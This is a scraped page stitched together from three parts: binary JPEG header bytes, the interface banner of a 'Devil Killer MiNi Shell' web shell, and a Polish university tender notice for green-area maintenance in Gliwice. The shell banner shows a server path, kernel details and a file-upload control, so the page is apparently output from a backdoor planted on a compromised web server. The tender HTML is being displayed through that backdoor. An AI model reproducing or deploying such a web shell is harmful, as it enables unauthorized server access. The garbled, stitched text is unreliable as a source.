JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150323/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150323/64208-N-2015.html

<p class="kh_header"><b>Gliwice: Kompleksowa pielęgnacja terenów zielonych. Oznaczenie sprawy: OZ/U/17/TB/15.</b><br>
<b>Numer ogłoszenia: 64208 - 2015; data zamieszczenia: 23.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Śląska , ul. Akademicka 2A, 44-100 Gliwice, woj. śląskie, tel. 32 2371334, 2371335, 2371171, faks 32 2371171, 2372194.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.polsl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa pielęgnacja terenów zielonych. Oznaczenie sprawy: OZ/U/17/TB/15..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje kompleksową pielęgnację terenów zielonych Politechniki Śląskiej na terenie Gliwic, Zabrza i Katowic w podziale na 2 zadania: Zadanie 1- Kompleksowa pielęgnacja zieleni zlokalizowanej w obrębie ul. Akademickiej oraz parkingów w Gliwicach. CPV: 77.31.00.00-6 Usługi sadzenia roślin oraz utrzymania terenów zielonych, CPV: 77.31.20.00-0 Usługi usuwania chwastów, CPV: 77.31.41.00-5 usługi w zakresie trawników, CPV:90.61.00.00-6 usługi sprzątania i zamiatania ulic, CPV: 90.91.40.00-7 usługa sprzątania parkingów. Zadanie 2- Kompleksowa pielęgnacja drzew i krzewów rosnących w dzielnicy akademickiej Politechniki Śląskiej w Gliwicach, Zabrzu i Katowicach. CPV: 77.21.15.00-7 Usługi pielęgnacji drzew. Wykonawcy nie przysługuje wynagrodzenie za niezamówioną przez Zamawiającego część usług ujętych w Arkuszu Kalkulacyjnym Ceny Oferty, jak również żadna rekompensata z tego tytułu - zgodnie z zasadami i w granicach wynikających z postanowień dotyczących prawa opcji przewidzianych niżej w pkt.3).  3. Informacje dot. prawa opcji (dotyczy zadania 1 i 2):  Zamawiający zastrzega sobie prawo możliwości zakupu większej ilości prac niż ilości podane 
w Ofercie Cenowej. Zakres, jakiego dotyczy opcja, obejmuje wyłącznie prace podane w Ofercie Cenowej. Łączna wartość umowy będzie równa kwocie obejmującej wartość wynikającą z wyceny wszystkich asortymentów zawartych w Ofercie Cenowej. Jednocześnie Zamawiający informuje, 
iż zobowiązuje się do realizacji zamówienia: w zadaniu 1- w zakresie koszenia trawników ilości min., tj. 50.000 m2, natomiast w pozostałym  zakresie co najmniej  5 % wartości wynikającej 
z wyceny ofertowej wszystkich prac, z wyjątkiem koszenia trawników,  a w zadaniu 2 w zakresie co najmniej 10% wartości wynikającej z wyceny wszystkich prac. 
Termin obowiązywania i realizacji umowy może zostać wydłużony dodatkowo o okres nie dłuższy niż 6 miesięcy. Uprawnienie to przysługuje w sytuacji, gdy w pierwotnym terminie realizacji umowy nie zostanie wyczerpany ilościowy lub wartościowy zakres przedmiotu zamówienia. O wydłużeniu terminu Zamawiający zawiadamia Wykonawcę najpóźniej w ostatnim dniu pierwotnego terminu, podając Wykonawcy w treści zawiadomienia nowy termin końcowy realizacji i obowiązywania umowy. Na powyższe postanowienie Wykonawca może nie wyrazić zgody, niemniej w razie braku zgody Wykonawcy, Zamawiający nie odpowiada za niezamówienie pełnego zakresu przedmiotowego objętych umową usług i Wykonawcy nie przysługują roszczenia związane 
z niezamówieniem: w zadaniu 1- koszenia trawników w ilości co najmniej 50.000 m2 , natomiast 
w pozostałym  zakresie co najmniej  5 % wartości wynikającej z wyceny ofertowej wszystkich prac, z wyjątkiem koszenia trawników, a w zadaniu 2  co najmniej 10% wartości usług. Brak sprzeciwu Wykonawcy w terminie 14 dni, strony uznają za wyrażenie zgody przez Wykonawcę.
4. Termin realizacji - -	zadanie 1 - od dnia zawarcia umowy do 31.12.2015 r., (termin rozpoczęcia prac będzie ustalony w porozumieniu z Zamawiającym) lub do wykorzystania limitu prac 
z możliwością przedłużenia terminu obowiązywania umowy za obustronną zgodą, 
w przypadku nie wykorzystania wartości umowy o max 6 miesięcy.
-	zadanie 2 - od dnia zawarcia umowy przez 12 miesięcy lub do wykorzystania limitu prac 
z możliwością przedłużenia terminu obowiązywania umowy za obustronną zgodą, 
w przypadku nie wykorzystania wartości umowy o max 6 miesięcy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 77.31.20.00-0, 77.31.41.00-5, 90.61.00.00-6, 90.91.40.00-7, 77.21.15.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wadium musi być wniesione przed upływem terminu składania ofert.
2. 	Wysokość wadium: 8.900,00 zł, w tym:
dla zadania 1 -   8.000,00 zł,
dla zadania 2 -      900,00 zł,
3. 	Zamawiający dopuszcza wniesienie wadium w innej walucie niż PLN, tj. w EURO lub USD. 
W takiej sytuacji Zamawiający zastosuje przeliczenie tych walut wg średniego kursu Narodowego Banku Polskiego (dalej: NBP) na dzień publikacji ogłoszenia o zamówieniu. W przypadku, gdy na ten dzień NBP nie opublikuje średnich kursów walut, do przeliczenia Zamawiający przyjmie pierwszy opublikowany po tej dacie średni kurs NBP. Średnie kursy walut dostępne są na stronie internetowej NBP pod następującym adresem: www.nbp.pl. 
4. 	Wadium może być wniesione w jednej lub kilku z form określonych w art. 45 ust. 6 ustawy.

a)	wadium wniesione w pieniądzu w walucie PLN należy wpłacić przelewem na rachunek bankowy Zamawiającego: 
Numer konta: ING Bank Śląski SA O Gliwice
60 1050 1230 1000 0002 0211 3056
IBAN: PL 60 1050 1230 1000 0002 0211 3056
z adnotacją: Wadium - oznaczenie sprawy: OZ/U/17/TB/15,

b)	wadium wniesione w pieniądzu w walucie EURO należy wpłacić przelewem na rachunek bankowy Zamawiającego:
 Numer konta: ING Bank Śląski SA O Gliwice
68 1050 1230 1000 0023 6055 5748  
IBAN: PL 68 1050 1230 1000 0023 6055 5748
z adnotacją: Wadium - oznaczenie sprawy: OZ/U/17/TB/15,

c)	wadium wniesione w pieniądzu w walucie USD należy wpłacić przelewem na rachunek bankowy Zamawiającego:
Numer konta: ING Bank Śląski SA O Gliwice
82 1050 1230 1000 0002 0291 9312
IBAN: PL 82 1050 1230 1000 0002 0291 9312
z adnotacją: Wadium - oznaczenie sprawy: OZ/U/17/TB/15.

UWAGA! Jeżeli przelew będzie zrealizowany przez inny podmiot, niż ten, który składa ofertę, 
zaleca się aby w tytule przelewu jednoznacznie wskazać, na czyją rzecz wadium zostało wniesione.

d)	w przypadku wniesienia wadium w innej formie należy oryginał dokumentu złożyć przed  upływem terminu składania ofert (osobiście lub pocztą) w miejscu:
Politechnika Śląska 
Dział Zamówień Publicznych i Zaopatrzenia 
44 - 100 Gliwice, ul. Konarskiego 18, pok. 511.
5. 	Zamawiający zwraca wadium w przypadku okoliczności określonych art. 46 ust. 1, 1a i 2 ustawy. 
6. 	W przypadku wniesienia wadium w innej walucie niż PLN na rachunek wskazany do wpłaty w PLN (pkt 4 ppkt a), bank Zamawiającego dokona jej przewalutowania na PLN, zatem na rachunku bankowym Zamawiającego znajdzie się kwota wyrażona w PLN (nie może ona być niższa niż wysokość wadium określona w pkt 2). W takiej sytuacji Zamawiający zwróci Wykonawcy kwotę wyrażoną w PLN, a ryzyko ewentualnej różnicy pomiędzy kwotą wpłaconą a kwotą, która zostanie zwrócona po przewalutowaniu (tj. ryzyko różnic kursowych) poniesie Wykonawca.
7. 	W przypadku wniesienia wadium w walucie PLN na rachunek wskazany do wpłaty w EURO lub USD (pkt 4 ppkt b) i c)), bank Zamawiającego dokona jej przewalutowania na EURO lub USD, zatem na rachunku bankowym Zamawiającego znajdzie się kwota wyrażona w EURO lub USD 
(po przewalutowaniu zgodnie z zasadą opisaną w pkt 3 nie może ona być niższa niż wysokość wadium określona w pkt 2). W takiej sytuacji Zamawiający zwróci Wykonawcy kwotę wyrażoną 
w EURO lub USD, a ryzyko ewentualnej różnicy pomiędzy kwotą wpłaconą a kwotą, która zostanie zwrócona po przewalutowaniu (tj. ryzyko różnic kursowych) poniesie Wykonawca.
8. 	Zamawiający zatrzymuje wadium wraz z odsetkami w przypadku okoliczności określonych art. 46 
ust. 4a i 5 ustawy. 
9. 	W treści dokumentu potwierdzającego wniesienie wadium w innej formie niż w pieniądzu, muszą znajdować się następujące informacje:
a) 	oznaczenie sprawy, nazwa zamówienia,
b) 	kwota wadium,
c) 	okres ważności dokumentu,
d) 	nazwa i adres Zamawiającego,
e) 	nazwa i adres wnoszącego wadium - Wykonawcy,
f)	treść oświadczenia gwaranta, zgodnie z którym gwarant zobowiązuje się bezwarunkowo 
i nieodwołalnie do wypłacenia kwoty roszczenia z tytułu wadium bez konieczności jego uzasadnienia, o ile Zamawiający stwierdzi w swoim żądaniu, że kwota roszczenia jest mu należna w związku z zaistnieniem co najmniej jednego z warunków zatrzymania wadium, określonych 
w ustawie z dnia 29.01.2004 r. Prawo Zamówień Publicznych (t. j. Dz. U. z 2013 r., poz. 907 
z późn. zm.).
10. 	Termin wypłaty roszczenia, o którym mowa powyżej nie może być dłuższy niż 14 dni od otrzymania od Zamawiającego pierwszego pisemnego żądania.

UWAGA!
Gwarant nie może uzależniać wykonania obciążającego go świadczenia na rzecz Zamawiającego od zachowania jakichkolwiek innych rygorów poza złożeniem przez Zamawiającego gwarantowi pisemnego oświadczenia, w którym zawarte jest żądanie wypłacenia oznaczonej kwoty pieniężnej na mocy udzielonej gwarancji (np. rygorem powodującym wadliwość złożonego dokumentu będą zapisy typu: 
w celu identyfikacji żądanie zapłaty należy przesłać za pośrednictwem banku prowadzącego rachunek beneficjenta, bank musi potwierdzić, że podpisy złożone na żądaniu zapłaty należą do osób upoważnionych do składania oświadczeń woli w imieniu beneficjenta; kwota gwarancji ulega zmniejszeniu w miarę upływu terminu jej ważności; gwarant jest zwolniony z realizacji gwarancji na skutek działań wojennych, stanu wyjątkowego, strajków, manifestacji, rewolucji, wewnętrznych zamieszek, aktów terroru, sabotażu, działania energii jądrowej, itp.; oraz inne tym podobne).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonanie lub wykonywanie przez Wykonawcę nie wcześniej niż 3 lata przed upływem terminu składania ofert, co najmniej 4 usług, z czego każda musi  obejmować: 
- w zakresie zadania 1 - kompleksowe utrzymanie terenów zielonych za min. 200.000,00 zł brutto
- w zakresie zadania 2 - cięcia pielęgnacyjne drzew oraz wycinka drzew za min. 20.000,00 zł brutto
Zamawiający dokona oceny spełnienia wyżej postawionego warunku na podstawie wykazu wykonanych usług wraz 
z dowodami, które muszą potwierdzać, że Wykonawca wykonał lub wykonuje usługi przynajmniej w rodzaju, ilościach i wartościach wyżej opisanych przez Zamawiającego oraz że ta część wykazanych usług, która wystarcza dla spełnienia postawionego przez Zamawiającego warunku została wykonana w sposób należyty.
Ww. dowodami są: poświadczenie (z tym, że w odniesieniu do zamówień nadal wykonywanych poświadczenie powinno być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert) lub oświadczenie Wykonawcy jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	w zakresie zadania 1 - dysponowanie przez Wykonawcę odpowiednią ilością sprzętu w celu realizacji zamówienia tj. kosiarki spalinowe, podkaszarka spalinowa, aerator, dmuchawa, nożyce do cięcia krzewów, nożyce do przycinania żywopłotów, rębak.
b)	w zakresie zadania 2 -  dysonowanie przez Wykonawcę sprzętem w celu realizacji zamówienia, tj. mechanicznymi nożycami i sekatorami, sprzętem do wywozu zrębków i klocy (wywrotka lub ciągnik), maszyną do zrębkowania gałęzi, urządzeniem do frezowania pni, podnośnikiem koszowym, mini koparką, koparko-ładowarką.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie minimum 1 osobą zdolną do wykonania  zamówienia, która będzie odpowiedzialna m. in. za prawidłową realizację zamówienia i kontrolę jakości jego wykonania:
a) w zadaniu 1 - kierownikiem robót, który posiada min. średnie wykształcenie w zakresie pielęgnacji zieleni oraz odbył co najmniej roczną praktykę zawodową przy pracach w zakresie zgodnym z przedmiotem zamówienia;  ogrodnikiem do wykonywania prac o charakterze technicznym z ukończoną szkołą ogrodniczą (zasadniczą, średnią), który odbył się co najmniej 12- miesięczną praktyką zawodową w branży związanej z utrzymaniem zieleni. 
b) w zadaniu 2- drwalem - operatorem pilarki; operatorem podnośnika koszowego;  osobą  z uprawnieniami do wykonywania wycinki/przycinki metodą alpinistyczną.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">A) Wymagania dotyczące przedmiotu zamówienia jakie musi spełnić Wykonawca: 1. Zaoferowanie ceny i warunków realizacji zamówienia zgodnie z  wymaganiami Zamawiającego. B) Wymagane dokumenty i załączniki potwierdzające spełnianie wymagań dotyczących przedmiotu zamówienia: 1.1 Oferta Cenowa. 2.1.Arkusz Kalkulacyjny Ceny Oferty.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3), zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. 2. Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski. 3. Dokumenty są składane w oryginale lub w formie kopii poświadczonej za zgodność z oryginałem przez Wykonawcę (czytelny podpis lub podpis z imienną pieczątką opatrzony słowami za zgodność z oryginałem) tj. przez osoby reprezentujące Wykonawcę lub przez pełnomocnika upoważnionego do złożenia oferty w jego imieniu. Sposób reprezentacji musi być zgodny z właściwym wypisem z rejestru. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia oraz w przypadku innych podmiotów na zasobach, których Wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów muszą być poświadczone za zgodność z oryginałem odpowiednio przez Wykonawcę lub te podmioty. 4. Zgodnie z art. 26 ust. 2b ustawy, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. Wymaga się aby dokument ten złożony był w oryginale oraz aby jednoznacznie potwierdzał, że Wykonawca będzie dysponował wskazanymi zasobami w trakcie realizacji zamówienia. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z wyżej przywołanym przepisem, odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy. Zamawiający nie wymaga, aby Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji zamówienia, przedkładał także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla Wykonawcy określonym w pkt. III.4.2) niniejszego ogłoszenia. 5. W przypadku składania oświadczeń lub podpisywania jakichkolwiek dokumentów przez pełnomocnika wymagane jest dołączenie oryginału pełnomocnictwa do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia publicznego z podpisem mocodawcy lub kopii uwierzytelnionej notarialnie. 6. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W tym przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Do oferty należy dołączyć stosowne pełnomocnictwo do reprezentowania podmiotów występujących wspólnie w postępowaniu o udzielenie zamówienia. Pełnomocnictwo to powinno być udzielone (podpisane) przez podmioty występujące wspólnie oraz złożone w formie oryginału lub kopii uwierzytelnionej notarialnie. Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający (przed zawarciem umowy) może żądać umowy regulującej ich współpracę. Wykonawcy składający ofertę wspólną ponoszą solidarną odpowiedzialność za wykonanie umowy. Wykonawcy występujący wspólnie mogą łącznie spełniać warunki, o których mowa w art. 22 ust. 1 ustawy. Każdy z Wykonawców występujących wspólnie musi z osobna spełniać warunki udziału w postępowaniu dotyczące braku podstaw do wykluczenia z postępowania o udzielenie zamówienia, o którym mowa w art. 24 ust. 1. W przypadku przynależenia do różnych grup kapitałowych, każdy z podmiotów występujących wspólnie jest zobowiązany do złożenia stosownej listy podmiotów należących do grupy kapitałowej. 7. W przypadku gdy w złożonych dokumentach lub oświadczeniach podane będą kwoty wyrażone w innych walutach niż PLN, w celu dokonania oceny spełnienia warunków udziału w postępowaniu, Zamawiający zastosuje przeliczenie tych walut wg średniego kursu Narodowego Banku Polskiego (dalej: NBP) na dzień publikacji ogłoszenia o zamówieniu. W przypadku gdy na ten dzień NBP nie opublikuje średnich kursów walut, do przeliczenia Zamawiający przyjmie pierwszy opublikowany po tej dacie średni kurs NBP. Średnie kursy walut dostępne są na stronie internetowej NBP pod następującym adresem: www.nbp.pl.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
